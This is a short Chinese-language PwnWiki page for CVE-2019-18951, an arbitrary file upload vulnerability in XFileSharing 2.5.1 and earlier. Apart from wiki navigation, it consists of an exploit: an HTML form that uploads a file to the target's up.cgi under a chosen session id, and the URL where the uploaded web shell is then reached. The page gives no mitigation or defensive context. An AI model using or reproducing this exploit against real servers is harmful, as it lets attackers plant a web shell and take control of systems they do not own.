CVE-2019-18951 Xfilesharing 2.5.1 本地文件上传shell漏洞

From PwnWiki
Revision as of 08:51, 17 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

Version: <=2.5.1

EXP

<form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
   <input type="text" name="sid" value="joe">
   <input type="file" name="file">
   <input type="submit" value="Upload" name="submit">
</form>

Shell : http://<target>/cgi-bin/temp/joe/she
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-18951_Xfilesharing_2.5.1_本地文件上傳shell漏洞/zh-cn&oldid=5211"